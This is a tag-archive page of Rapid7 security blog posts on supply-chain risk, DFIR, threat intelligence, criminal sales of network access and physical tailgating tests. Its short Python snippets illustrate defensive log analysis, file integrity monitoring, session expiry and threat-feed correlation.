Tag Archives: Detection and Response

Security at Scale in the Open-Source Supply Chain

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/09/08/security-at-scale-in-the-open-source-supply-chain/


“We’ve all heard of paying it forward, but this is ridiculous!” That’s probably what most of us think when one of our partners or vendors inadvertently leaves an open door into our shared supply-chain network; an attacker can enter at any time. Well, we probably think in slightly more expletive-laden terms, but nonetheless, no organization or company wants to be the focal point of blame from a multitude of (formerly) trusting partners or vendors.

Open-source software (OSS) is particularly susceptible to these vulnerabilities. OSS is simultaneously incredible and incredibly vulnerable. In fact, structuring operations largely on OSS can introduce so many risks that vendors may not prioritize patching a vulnerability once their security team is alerted. And can we blame them? They want to continue operations and feed the bottom line, not put a pause on operations to forever chase vulnerabilities and patch them one-by-one. But that leaves all of their supply-chain partners open to exploitation. What to do?

The supply-chain scene

Throughout a 12-month timeframe spanning 2019-2020, attacks aimed at OSS increased 430%, according to a study by Sonatype. It’s not quite as simple as “gain access to one, gain access to all,” but if a bad actor is properly motivated, this is exactly what can happen. In terms of motivation, supply-chain attackers can fall into 2 groups:

  • Bandwagoners: Attackers falling into this group will often wait for public disclosure of supply-chain vulnerabilities.
  • Ahead-of-the-curvers: Attackers falling into this group will actively hunt for and exploit vulnerabilities, saddling the unfortunate organization with malware and threatening its entire supply chain.

To add to the favor of attackers, the same Sonatype study also found that a shockingly high percentage of security organizations do not even learn of new open-source vulnerabilities in the short term after they're disclosed. Sure, everyone's busy and has their priorities. But that ethos persists while these vulnerabilities are being exploited. Perhaps the project was shipped on time, but malicious code was simultaneously being injected somewhere along the line. Then, instead of continuing with forward progress, remediation becomes the name of the game.

According to the Sonatype report, there were more than a trillion open-source component and container download requests in 2020 alone. The most important aspects to consider then are the security history of your component(s) and how dependents along your supply chain are using them. Obviously, this can be overwhelming to think about, but with researchers increasingly focused on remediation at scale, the future of supply-chain security is starting to look brighter.

Learn more about open-source security + win some cash!

Submit to the 2021 Velociraptor Contributor Competition

Securing at scale

Instead of the one-by-one approach to patching, security professionals need to start thinking about securing entire classes of vulnerabilities. It’s true that there is no current catch-all mechanism for such efficient action. But researchers can begin to work together to create methodologies that enable security organizations to better prioritize vulnerability risk management (VRM) instead of filing each one away to patch at a later date.

Of course, preventive security measures — inclusive of our shift-left culture — can help to mitigate the need to scale such remediation actions; the fact remains though that bad actors will always find a way. Therefore, until there are effective ways to eliminate large swaths of vulnerabilities at once, there is a growing need for teams to adhere to current best practices and measures like:  

  • Dedicating time and resources to help ensure code is secure all along the chain
  • Thinking holistically about the security of open-source code with regard to the CI/CD lifecycle and the entire stack
  • Being willing to pitch in and develop coordinated, industry-wide efforts to improve the security of OSS at scale
  • Educating outside stakeholders on just how interdependent supply-chain-linked organizations are

As supply-chain attackers refine their methods to target ever-larger companies, the pressure is on developers to refine their understanding of how each and every contributor on a team can expose the organization and its partners along the chain, as The Linux Foundation points out. However, is this too much to put on the shoulders of DevOps? Shifting left to a DevSecOps culture is great and all, but teams are now being asked to think in the context of securing an entire supply chain’s worth of output.

This is why the industry at large must continue the push for research into new ways to eliminate entire classes of vulnerabilities. That’s a seismic shift left that will only help developers — and really, everyone — put more energy into things other than security.

Monitoring mindfully

While a proliferation of OSS components — as advantageous as they are for collaboration at scale — can make a supply chain vulnerable, the power of one open-source community can help monitor another open-source community. Velociraptor by Rapid7 is an open-source digital forensics and incident response (DFIR) platform.

This powerful DFIR tool thrives in loaded conditions. It can quickly scale incident response and monitoring and help security organizations to better prioritize remediation — actions well-suited to address the scale of modern supply-chain attacks. How quickly organizations choose to respond to incidents or vulnerabilities is, of course, up to them.

Supply chain security is ever-evolving

If one link in the chain is attacked via a long-languishing vulnerability whose risk has become ever harder to manage, it almost goes without saying that the company's partners and vendors will immediately lose confidence in it, because the entire chain is now at risk. The public's confidence will likely follow.

There are any number of preventive measures an interdependent security organization can implement. However, the need for further research into scaling security for whole classes of vulnerabilities comes at a crucial time as global supply-chain attacks more frequently occur in all shapes and sizes.

Want to contribute to a more secure open-source future?

Submit to the 2021 Velociraptor Contributor Competition

Cybersecurity as Digital Detective Work: DFIR and Its 3 Key Components

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/09/03/cybersecurity-as-digital-detective-work-dfir-and-its-3-key-components/


Thanks to CSI and the many other crime-solving shows that have grasped our collective imagination for decades, we’re all at least somewhat familiar with the field of forensics and its unique appeal. At some point, anyone who’s watched these series has probably envisioned themselves in the detective’s shoes, piecing together the puzzle of a crime scene based on clues others might overlook — and bringing bad guys to justice at the end.

Cybersecurity lends itself particularly well to this analogy. It takes an expert eye and constant vigilance to stay a step ahead of the bad actors of the digital world. And after all, there aren’t many other areas in the modern tech landscape where the matter at hand is actual crime.

Digital forensics and incident response (DFIR) brings detective-like skills and processes to the forefront of cybersecurity practice. But what does DFIR entail, and how does it fit into your organization’s big-picture incident detection and response (IDR) approach? Let’s take a closer look.

What is DFIR — and are you already doing it?

Security expert Scott J. Roberts defines DFIR as “a multidisciplinary profession that focuses on identifying, investigating, and remediating computer-network exploitation.” If you hear that definition and think, “Hey, we’re already doing that,” that may be because, in some sense, you already are.

Perhaps the best way to think of DFIR is not as a specific type of tech or category of tools, but rather as a methodology and a set of practices. Broadly speaking, it’s a field within the larger landscape of cybersecurity, and it can be part of your team’s incident response approach in the context of the IDR technology and workflows you’re already using.

To be good at cybersecurity, you have to be something of a detective — and the detective-like elements of the security practice, like log analysis and incident investigation, fit nicely within the DFIR framework. That means your organization is likely already practicing DFIR at some level, even though you might not have the full picture in place just yet.

3 key components of DFIR

The question is, how do you go from doing some DFIR practices piecemeal to a more integrated approach? And what are the benefits when you do it well? Here are 3 key components of a well-formulated DFIR practice.

1. Multi-system forensics

One of the hallmarks of DFIR is the ability to monitor and query all critical systems and asset types for indications of foul play. Roberts breaks this down into a few core functions, including file-system forensics, memory forensics, and network forensics. Each of these involves monitoring activity for signs of an attack on the system in question.

He also includes log analysis in this category. Although this is largely a tool-driven process these days, a SIEM or detection-and-response solution like InsightIDR can help teams keep on top of their logs and respond to the alerts that really matter.
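At its simplest, tool-driven log analysis boils down to pattern-matching records against known signs of foul play. The sketch below is a minimal illustration only; the log format, regex, and threshold are invented, and a real SIEM correlates far richer telemetry at scale:

```python
import re
from collections import Counter

# Hypothetical auth-log lines; real formats vary by system and source.
LOG_LINES = [
    "Sep 08 10:01:02 sshd: Failed password for root from 203.0.113.7",
    "Sep 08 10:01:05 sshd: Failed password for root from 203.0.113.7",
    "Sep 08 10:01:09 sshd: Failed password for admin from 203.0.113.7",
    "Sep 08 10:02:11 sshd: Accepted password for alice from 198.51.100.4",
]

FAILED = re.compile(r"Failed password for \S+ from (\S+)")

def flag_brute_force(lines, threshold=3):
    """Count failed logins per source IP and flag those at or above threshold."""
    failures = Counter()
    for line in lines:
        match = FAILED.search(line)
        if match:
            failures[match.group(1)] += 1
    return {ip: count for ip, count in failures.items() if count >= threshold}

suspicious = flag_brute_force(LOG_LINES)
print(suspicious)  # {'203.0.113.7': 3}
```

The point is the shape of the workflow, not the regex: normalize records, aggregate by entity, and alert only when activity crosses a meaningful threshold.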

2. Attack intelligence

Like a detective scouring the scene of a crime for that one clue that cracks the case, spotting suspicious network activity means knowing what to look for. There’s a reason why the person who solves the crime on our favorite detective shows is rarely the rookie and more often the grizzled veteran — a keen interpretative eye is formed by years of practice and skill-building.

For the practice of DFIR, this means developing the ability to think like an attacker, not only so you can identify and fix vulnerabilities in your own systems, but so that you can also spot the signs they’ve been exploited — if and when that happens. A pentesting tool like Metasploit provides a critical foundation for practicing DFIR with a high level of precision and insight.

3. Endpoint visibility

It’s no secret there are now more endpoints in corporate networks than ever before. The huge uptick in remote work during the COVID-19 pandemic has only increased the number and types of devices accessing company data and applications.

To do DFIR well in this context, security teams need visibility into this complex system of endpoints — and a way to clearly organize and interpret data gathered from them. A tool like Velociraptor can be critical in this effort, helping teams quickly collect and view digital forensic evidence from all of their endpoints, as well as proactively monitor them for suspicious activity.

A team effort

The powerful role open-source tools like Metasploit and Velociraptor can have in DFIR reminds us that incident response is a collaborative effort. Joining forces with other like-minded practitioners across the industry helps detection-and-response teams more effectively spot and stop attacks.

Velociraptor has launched a friendly competition to encourage knowledge-sharing within the field of DFIR. They’re looking for useful content and extensions to their open-source platform, with cash prizes for those that come up with submissions that add the most value and the best capabilities. The deadline is September 20, 2021, and there’s $5,000 on the line for the top entry.

Go head-to-head with other digital detectives

Submit to the 2021 Velociraptor Contributor Competition

SANS Experts: 4 Emerging Enterprise Attack Techniques

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/09/02/sans-experts-4-emerging-enterprise-attack-techniques/


In a recent report, a panel of SANS Institute experts broke down key takeaways and emerging attack techniques from this year’s RSA Security Conference. The long and short of it? This next wave of malicious methodologies isn’t on the horizon — it’s here.

When it comes to supply-chain and ransomware attacks, bad actors seem to have migrated to new ground over the last 2 years. The SANS Institute report found that government, healthcare, and retail (thanks in large part to online spending at the height of the pandemic) were the sectors showing the largest spike from the first quarter of 2020 to this year, in terms of finding themselves in attackers’ crosshairs. As larger incidents increase in frequency, let’s take a look at 4 specific attack formats trending toward the norm and how you can stay ahead of them.

1. Cracks in the facade of software integrity

Developers are under greater pressure to prioritize security (i.e., shift left) within the Continuous Integration/Continuous Delivery (CI/CD) lifecycle. This would seem to be at stark odds with the number of applications built on open-source software (OSS). And, if a security organization is part of a supply chain, how many pieces of OSS are being used at one time along that chain? The potential is huge for an exponential jump in the number of vulnerabilities in that group of interdependent organizations.

There are ways to mitigate these seemingly unstoppable threats. Measures like file integrity monitoring (FIM) surface changes to critical files on your network, alerting you to suspicious activity while also providing context as to the affected users and/or assets. Threat hunting can also help to expose vulnerabilities.
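The core idea behind FIM can be sketched in a few lines: hash every critical file, then diff the current state against a trusted baseline. This is a minimal illustration under simplified assumptions, not how any particular commercial FIM product is implemented:

```python
import hashlib
import tempfile
from pathlib import Path

def hash_file(path: Path) -> str:
    """SHA-256 digest of a file's contents."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline(root: Path) -> dict:
    """Record a content hash for every file under root."""
    return {str(p): hash_file(p) for p in root.rglob("*") if p.is_file()}

def detect_changes(root: Path, baseline: dict) -> dict:
    """Compare the current state to the baseline; report added, deleted, and modified files."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }

# Quick demonstration in a throwaway directory: baseline, tamper, detect.
with tempfile.TemporaryDirectory() as d:
    root = Path(d)
    (root / "config.txt").write_text("original contents")
    baseline = build_baseline(root)
    (root / "config.txt").write_text("tampered contents")  # simulate an unauthorized change
    report = detect_changes(root, baseline)
```

A real deployment would also watch permissions and ownership, stream events rather than polling, and attach user/asset context to each alert, as the paragraph above describes.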

Used with a cloud-native, extended-detection-and-response (XDR) approach, Rapid7’s proactive threat-hunting capabilities leverage multiple security and telemetry sources to act on fine-grained insights and empower teams to quickly take down threats.

2. Do you have a token to get into that session?

Commonly, applications make use of tokens to identify a person wishing to access secure data, like banking information. A user's mobile app will exchange the token with a server to verify that, indeed, this is the actual user requesting the information and not an attacker. Improper session handling happens when the protocols these applications rely on don't properly secure those identifying tokens.

The issue of improper user authentication was exacerbated by the onslaught of the pandemic, as companies raced to secure — or not — enterprise software for a quickly scaled-up remote workforce. Individual users can help by making it a best practice to always hit that little “log off/out” button once they're finished. Businesses can reinforce this by setting tokens to expire automatically after a predetermined length of time.

At the enterprise level, security organizations can use a comprehensive application-testing strategy to monitor for weak session handling and nefarious attacker actions like:

  • Guessing a valid session token after only short-term monitoring
  • Using static tokens to target users, even if they’re not logged in
  • Leveraging a token to delete user data without knowing the username/password
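The server-side countermeasures implied by that list (unguessable tokens, automatic expiry, and immediate invalidation on logout) can be sketched roughly as follows. The TTL and in-memory store are illustrative assumptions; a production system would persist sessions and handle renewal:

```python
import secrets
import time

SESSION_TTL_SECONDS = 900  # e.g., expire idle sessions after 15 minutes

_sessions = {}  # token -> (username, issued_at); illustrative in-memory store

def issue_token(username: str) -> str:
    """Issue a cryptographically random token (never static or guessable)."""
    token = secrets.token_urlsafe(32)
    _sessions[token] = (username, time.monotonic())
    return token

def validate_token(token: str):
    """Return the username for a live token, or None if unknown or expired."""
    entry = _sessions.get(token)
    if entry is None:
        return None
    username, issued_at = entry
    if time.monotonic() - issued_at > SESSION_TTL_SECONDS:
        del _sessions[token]  # server-side expiry, mirroring the auto-expire advice above
        return None
    return username

def logout(token: str) -> None:
    """Invalidate immediately: the server-side effect of the user hitting 'log out'."""
    _sessions.pop(token, None)

# Demonstration of the lifecycle:
token = issue_token("alice")
user = validate_token(token)          # "alice" while the session is live
logout(token)
after_logout = validate_token(token)  # None once invalidated
```

Random tokens defeat the first two attacks in the list (guessing and static-token reuse), while server-side expiry and logout defeat the third by refusing stale tokens outright.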

3. Turning the machines against us

No, that’s not a Terminator reference. If someone has built out a machine-learning (ML) algorithm correctly, it should do nothing but assist an organization in accomplishing its business goals. When it comes to security, this means being able to recognize traffic patterns that are relatively unknown and classifying them according to threat level.

However, attackers are increasingly able to corrupt ML algorithms and trick them into labeling malicious traffic as safe. Another sophisticated method is for attackers to purchase their own ML products and use them as training grounds to produce and deploy malware. InsightIDR from Rapid7 leverages user-behavior analytics (UBA) to stay ahead of malicious actions against ML algorithms.

Understanding how your ML product functions is key; it should build a baseline of normal user behavior across the network, then match new actions against data gleaned from a combination of machine learning and statistical algorithms. In this way, UBA exposes threats without relying on prior identification in the wild.
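As a toy illustration of the statistical side of that baseline-and-compare approach, a simple z-score test flags a new observation that deviates sharply from a user's own history. Real UBA models are far more sophisticated than this sketch:

```python
from statistics import mean, stdev

def baseline_stats(history):
    """Summarize normal behavior, e.g., daily logins or bytes transferred per user."""
    return mean(history), stdev(history)

def is_anomalous(value, history, z_threshold=3.0):
    """Flag a new observation that deviates sharply from the user's own baseline."""
    mu, sigma = baseline_stats(history)
    if sigma == 0:
        return value != mu
    return abs(value - mu) / sigma > z_threshold

# A user who normally logs in ~10 times a day suddenly logs in 100 times.
normal_history = [10, 12, 11, 9, 10, 11]
spike_flagged = is_anomalous(100, normal_history)  # True: far outside the baseline
typical_ok = is_anomalous(11, normal_history)      # False: within normal variation
```

The key property, as the paragraph notes, is that nothing here depends on a known-bad signature; the threat is exposed purely by deviation from the user's own baseline.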

4. Ramping up ransomware

Let’s face it: Attackers all over the world are essentially creating repositories and educational platforms on how to evolve and deploy ransomware. Building ransomware takes sophistication, but packaged ransomware is now widely available for the non-tech set to, for lack of a more apt phrase, plug and play.

As attack methodologies ramp up in frequency and size, it’s not just data at risk anymore. Bad actors are threatening companies with wide public exposure and potentially a catastrophic loss to reputation. But there are opportunities to learn offensive strategies, as well as how attacker techniques can become signals for detection.

Target shifts

If the data in the SANS report tells us anything, it’s that attackers and their evolving methodologies — like those mentioned above — are constantly searching not just for bigger targets and paydays, but also easier paths to their goals.

Targeted industry shifts in year-over-year data show that the company or sector you’re in clearly makes no difference. Perhaps the biggest factor in bad actors’ strategies is the degree of ease with which they get what they want — and some industries still fall woefully behind when it comes to security and attack readiness.

Learn more about the latest threat trends

Read the full SANS report

[The Lost Bots] Episode 4: Deception Technology

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/30/the-lost-bots-episode-4-deception-technology/


Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. This episode is a little different, as it’s Jeffrey talking one-on-one with you about one of his favorite subjects: deception technology! Watch below to learn about the history, special characteristics, goals, and possible roadblocks (with counterpoints!) of what he likes to call “HoneyThings,” and also learn practical advice about the application of this amazing technology.




Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles insider threats where the threat is definitely inside your organization, but maybe not in the way you think.

[R]Evolution of the Cyber Threat Intelligence Practice

Post Syndicated from Alon Arvatz original https://blog.rapid7.com/2021/08/25/r-evolution-of-the-cyber-threat-intelligence-practice/


The cyber threat intelligence (CTI) space is one of the most rapidly evolving areas in cybersecurity. Not only are technology and products being constantly updated and evolved, but also methodologies and concepts. One of the key changes happening in the last few years is the transition from threat intelligence as a separate pillar — which disseminates threat reports to the security organization — to threat intelligence as a central hub that feeds all the functions in the security organization with knowledge and information on the most prioritized threats. This change requires a shift in both mindset and methodology.

Traditionally, CTI has been considered a standalone practice within the security organization. Whether the security organization has dedicated personnel or not, it has been a separate practice that produces reports about various threats to the organization — essentially, looking at the threat landscape and making the same threat data accessible to all the functions in the security organization.

Traditional CTI model

A traditional model of the CISO and the different functions in their security organization

The latest developments in threat intelligence methodologies are disrupting this concept. Effectively, threat intelligence is no longer a separate pillar, but something that should be ingested and considered in every security device, process, and decision-making event. Thus, the mission of the threat intelligence practitioner is no longer to simply create “threat reports,” but also to make sure that every part of the security organization effectively leverages threat intelligence as part of its day-to-day mission of detection, response, and overall risk management.

The evolution of threat intelligence is supported by the following primary trends in the cybersecurity space:

  1. Automation — Due to a lack of trained human resources, organizations are implementing more automation into their security operations. Supported by the adoption of SOAR technologies, machine-to-machine communication is becoming much easier and more mainstream. Automation allows for pulling data from your CTI tools and constantly feeding it into various security devices and processes, without human intervention. Essentially, this supports seamless, near-real-time integration of CTI into various security devices, as well as automated decision-making processes.
  2. Expanded access to threat intelligence — Threat intelligence vendors are investing a lot more in solutions that democratize threat intelligence and make it easy for various security practitioners to consume — for example, native applications for Security Information and Event Management (SIEM) to correlate threat data against internal logs, or browser extensions that inject threat context and risk analysis into the browser. Previously, you had lots of threat data that needed manual labor to review and take action; today, you have actionable insights that are seamlessly integrated into your security devices.
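The machine-to-machine correlation described above reduces to a simple sketch: pull indicators from a feed and match them against log records automatically. The feed entries and log schema below are invented for illustration; real integrations would consume STIX/TAXII feeds or vendor APIs:

```python
# Hypothetical threat-feed entries; real feeds carry far richer context.
THREAT_FEED = [
    {"indicator": "203.0.113.7", "type": "ip", "risk": "high"},
    {"indicator": "evil.example.com", "type": "domain", "risk": "medium"},
]

def correlate(logs, feed):
    """Match field values in log records against feed indicators, no human in the loop."""
    iocs = {entry["indicator"]: entry for entry in feed}
    hits = []
    for record in logs:
        for value in record.values():
            if value in iocs:
                hits.append({"record": record, "intel": iocs[value]})
    return hits

# Hypothetical SIEM records: one benign, one touching a known-bad IP.
logs = [
    {"src_ip": "198.51.100.4", "dest": "intranet.local"},
    {"src_ip": "203.0.113.7", "dest": "fileserver.local"},
]
hits = correlate(logs, THREAT_FEED)
```

Run on every new batch of logs, a loop like this is the seed of the "seamless, near-real-time integration" the trend describes: threat context attaches itself to events before an analyst ever looks at them.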

Updated CTI model

Today’s new model of the CISO and the role of threat intelligence in supporting the different functions in their organization

The new mission of the CTI practitioner

The new mission of the CTI practitioner is to tailor threat intelligence to every function in the security organization and make it an integral part of the function’s operations. This new approach requires them to not only update their mission, but also to gain new soft skills that allow them to collaborate with other functions in the security organization.

The CTI practitioner’s newly expanded mindset and skill set would include:

  1. Developing close relationships with various stakeholders — It’s not enough to send threat reports if the internal client doesn’t know how to consume them. What looks simple for a CTI specialist is not necessarily simple to other security practitioners. Thus, in order to achieve the CTI mission, it’s important to develop close relationships with various stakeholders so that the CTI specialist can better understand their pain points and requirements, as well as tailor the best solution for them to consume. This activity serves as a platform to raise their awareness of CTI’s value, thereby helping them come up with and commit to new processes that include CTI as part of their day-to-day.
  2. Having solid knowledge of the company strategy and operations — The key to a successful CTI program is relevancy; without relevancy, you’re left with lots of unactionable threat data. Relevancy is twice as important when you want to incorporate CTI into various functions within the organization. Relevant CTI can only be achieved when the company business, organizational chart, and strategy are clear. This clarity enables the CTI practitioner to realize what intelligence is relevant to each function and tailor it to the needs of each function.
  3. Deep understanding of the company tech stack — The CTI role doesn’t require only business understanding, but also deep technical understanding of the IT infrastructure and architecture. This knowledge will allow the CTI specialist to tailor the intelligence to the risks imposed on the company tech stack, and it will support building a plan to correlate internal logs against external threat intelligence.

Following are a few examples of processes the threat intelligence team needs to implement in order to tailor threat intelligence to other security functions and make it an integral part of their operations:

  1. Third-party breach monitoring — With the understanding that the weakest link might be your third party, timely detection of third-party breaches is increasingly important. CTI monitoring supports early detection of those cases, enabling the IR team to minimize the risk. An example of this is monitoring ransomware gangs’ leak sites for any data belonging to your company that has been leaked from any third party.
  2. SOC incident triage — One of the main missions of the Security Operations Center (SOC) is to identify cyber incidents and make a quick decision on mitigation steps. This can be tremendously improved through threat intelligence information to triage the indicators (e.g., domains and IP addresses) of each event. Threat intelligence is the key to an effective and efficient triage of these events. This can be easily achieved through a threat intelligence browser extension that triages the IOCs while browsing in the SIEM.
  3. Vulnerability prioritization process — The traditional vulnerability prioritization process relies on the CVSS score and the criticality of the vulnerable assets. This focuses the prioritization efforts on the impact of an exploited vulnerability and gives very little weight to the probability that the vulnerability will actually be exploited. Hacker chatter on the Dark Web and security researchers’ publications can provide a good understanding of the probability that a certain vulnerability will actually be leveraged by a threat actor to launch a cyberattack. This probability factor is an essential missing piece in the vulnerability prioritization process.
  4. Trends analysis — The CTI practitioner has access to a variety of sources, allowing them to monitor trends in the cybersecurity domain, their specific industry, or in the data held in the company. This should be provided to leadership (not only security leadership) in order to allow smart, agile decision-making on existing risks.
  5. Threat intel and cybersecurity knowledge sharing — As with “traditional” intelligence, knowledge sharing can be a major force multiplier in cyber intelligence, too. Threat intel teams should aim to create as much external cooperation with other security teams — especially from the industry they work in — as they can. This will allow the team and the security organization to better understand the risks posed to the industry and, accordingly, their company. This information will also allow the CISO better visibility into the threat landscape that’s relevant to the company.
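The probability-weighted prioritization described in item 3 might look something like the sketch below. The weights and scales are purely illustrative assumptions, not an industry standard:

```python
def priority_score(cvss: float, asset_criticality: float, exploit_probability: float) -> float:
    """
    Blend impact (CVSS scaled by asset criticality) with likelihood of exploitation.
    cvss: 0-10, asset_criticality: 0-1, exploit_probability: 0-1.
    The 50/50 weighting is an illustrative choice, not a recommendation.
    """
    impact = (cvss / 10) * asset_criticality
    return round(impact * 0.5 + exploit_probability * 0.5, 3)

# A lower-CVSS bug with active Dark Web chatter can outrank a "quiet" critical one.
quiet_critical = priority_score(cvss=9.8, asset_criticality=0.9, exploit_probability=0.05)
chattered_medium = priority_score(cvss=6.5, asset_criticality=0.9, exploit_probability=0.9)
```

With these inputs, the medium-severity vulnerability with a high exploitation probability scores higher than the critical one nobody is exploiting, which is exactly the reordering the probability factor is meant to produce.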

A valuable proposition

While the evolving CTI model is making threat intelligence implementation a bit more complex, as it includes collaboration with different functions, it makes the threat intelligence itself far more valuable and impactful than ever before. The future of cyber threat intelligence is getting a lot more exciting!

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Post Syndicated from Paul Prudhomme original https://blog.rapid7.com/2021/08/24/cybercriminals-selling-access-to-compromised-networks-3-surprising-research-findings/


Cybercriminals are innovative, always finding ways to adapt to new circumstances and opportunities. The proof of this can be seen in the rise of a certain variety of activity on the dark web: the sale of access to compromised networks.

This type of dark web activity has existed for decades, but it matured and began to truly thrive amid the COVID-19 global pandemic. The worldwide shift to a remote workforce gave cybercriminals more attack surface to exploit, which fueled sales on underground criminal websites, where buyers and sellers transfer network access to compromised enterprises and organizations to turn a profit.

Having witnessed this sharp rise in breach sales in the cybercriminal ecosystem, IntSights, a Rapid7 company, decided to analyze why and how criminals sell their network access, with an eye toward understanding how to prevent these network compromise events from happening in the first place.

We have compiled our network compromise research, as well as our prevention and mitigation best practices, in the brand-new white paper “Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums.”

During the process of researching and analyzing, we came across three surprising findings we thought worth highlighting. For a deeper dive, we recommend reading the full white paper, but let’s take a quick look at these discoveries here.

1. The massive gap between average and median breach sales prices

As part of our research, we took a close look at the pricing characteristics of breach sales in the criminal-to-criminal marketplace. Unsurprisingly, pricing varied considerably from one sale to another. A number of factors can influence pricing, including everything from the level of access provided to the value of the victim as a source of criminal revenue.

That said, we found an unexpectedly significant discrepancy between the average price and the median price across the 40 sales we analyzed. The average price came out to approximately $9,640 USD, while the median price was $3,000 USD.

In part, this gap can be attributed to a few unusually high prices among the most expensive offerings. The lowest price in our dataset was $240 USD for access to a healthcare organization in Colombia, but healthcare pricing tends to trend lower than other industries, with a median price of $700 in this sample. On the other end of the spectrum, the highest price was for a telecommunications service provider that came in at about $95,000 USD worth of Bitcoin.

Because of this discrepancy, IntSights researchers view the average price of $9,640 USD as a better indicator of the higher end of the price range, while the median price is more representative of typical pricing for these sales — $3,000 USD was also the single most common price. Nonetheless, it was fascinating to discover this difference and dig into the reasons behind it.
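The skew the researchers describe is easy to demonstrate: a handful of outliers at the top pulls the mean well above the median. The prices below are invented for illustration, not the actual IntSights dataset:

```python
from statistics import mean, median

# Illustrative prices in USD: mostly modest sales plus a few expensive outliers.
prices = [240, 700, 1500, 3000, 3000, 3000, 4500, 8000, 60000, 95000]

average_price = mean(prices)   # pulled upward by the most expensive offerings
median_price = median(prices)  # closer to the "typical" sale
```

With even two outliers in ten sales, the mean lands several multiples above the median, which is why the median is the better indicator of typical pricing in a long-tailed market like this one.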

2. The numerical dominance of tech and telecoms victims

While the sales of network access are a cross-industry phenomenon, technology and telecommunications companies are the most common victims. Not only are they frequent targets, but their compromised access also commands some of the highest prices on the market.

In our sample, tech and telecoms represented 10 of the 46 victims, or 22% of those affected by industry. Out of the 10 most expensive offerings we analyzed, four were for tech and telecommunications organizations, and there were only two that had prices under $10,000 USD. A telecommunications service provider located in an unspecified Asian country also had the single most expensive offering in this sample at approximately $95,000 USD.

After investigating the reasoning behind this numerical dominance, IntSights researchers believe that the high value and high number of tech and telecommunications companies as breach victims stem from their usefulness in enabling further attacks on other targets. For example, a cybercriminal who gains access to a mobile service provider could conduct SIM swapping attacks on digital banking customers who use two-factor authentication via SMS.

These prices were surprisingly high compared to other industries, but for good reason: the access may cost more upfront, but it can prove more lucrative in the long run.

3. The low proportion of retail and hospitality victims

As previously mentioned, we broke down the sales of network access based on the industries affected, and to our surprise, only 6.5% of victims were in retail and hospitality. This seemed odd, considering the popularity of the industry as a target for cybercrime. Think of all the headlines in the news about large retail companies falling victim to a breach that exposed millions of customer credentials.

We explored the reasoning behind this low proportion of victims in the space and came to a few conclusions. For example, we theorized that the main customers for these network access sales are ransomware operators, not payment card data collectors. Payment card data collection is likely a more profitable way to monetize access to a retail or hospitality business, whereas putting ransomware on a retail and hospitality network would actually "kill the goose that lays the golden eggs."

We also found that the second-most expensive offering in this sample was for access to an organization supporting retail and hospitality businesses. The victim was a third party managing customer loyalty and rewards programs, and the seller highlighted how a buyer could monetize this indirect access to its retail and hospitality customer base. This victim may have been more valuable because, among other things, loyalty and rewards programs are softer targets with weaker security than credit cards and bank accounts; thus, they’re easier to defraud.

Learn more about compromised network access sales

Curious to learn more about the how and why of cybercriminals selling compromised network access? Read our white paper, Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums, for the full story behind this research and how it can inform your security efforts.

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/23/the-lost-bots-bonus-episode-velociraptor-contributor-competition/

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Welcome back for a special bonus edition of The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this extra installment, Jeffrey chats with Mike Cohen, Digital Paleontologist for Velociraptor, an open source endpoint visibility tool that Rapid7 acquired earlier this year.

Mike fills us in on Velociraptor's very first Contributor Competition, a friendly hackathon-style event that invites entrants to get their hands dirty and build the best extension to the Velociraptor platform that they can. Check out the episode to hear more about the competition, who's judging, what they're looking for, and what's coming your way if you win — spoiler: there's a cool $5,000 waiting for you if you nab the No. 1 spot, plus a range of other monetary and merchandise prizes. Jeffrey himself even plans to throw his hat in the ring!




Stay tuned for future episodes of The Lost Bots! And don’t forget to start working on your entry for the 2021 Velociraptor Contributor Competition.

[The Lost Bots] Episode 3: Stories From the SOC

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/16/the-lost-bots-episode-3-stories-from-the-soc/

[The Lost Bots] Episode 3: Stories From the SOC

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this third episode, Jeffrey is joined by Stephen Davis, a Technical Lead and Customer Advisor on Rapid7’s Managed Detection and Response team. Stephen shares a story about a phishing attack on an organization, possibly by an advanced persistent threat (APT) — insert spooky “dun dun dun” sound effect — through a malicious Excel document. Watch below to hear about how our MDR team caught this attack, lessons learned, and tips for how teams can stay ahead of these types of threats in their environment.




Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles deception technology — what it is, how you can use it, and why it matters.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Post Syndicated from Ted Raffle original https://blog.rapid7.com/2021/08/13/when-one-door-opens-keep-it-open-a-new-tool-for-physical-security-testing/

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

As penetration testers, we spend most of our time working with different types of networks, applications, and hardware devices. Physical security is another fun area we get to work in during physical social engineering penetration tests and red team engagements, which sometimes includes attempts to gain entry into facilities or sensitive areas within them.

Just like when we’re testing a virtual network’s defenses against intruders, pentesters need to put themselves in the mindset of attackers when testing physical security — and that means thinking creatively.

One classic method of gaining physical access is “tailgating,” where you wait for someone else to be going into or coming out of where you want to go, so you can follow them in before a door closes. To help pentesters simulate an attacker who can tailgate without suspiciously hovering around the door, we’ve come up with a neat little device to help with outward-opening doors with ferromagnetic metal frames, like steel entry doors. This tool is one more way pentesters can recreate the thought process of attackers — and help organizations outsmart them.

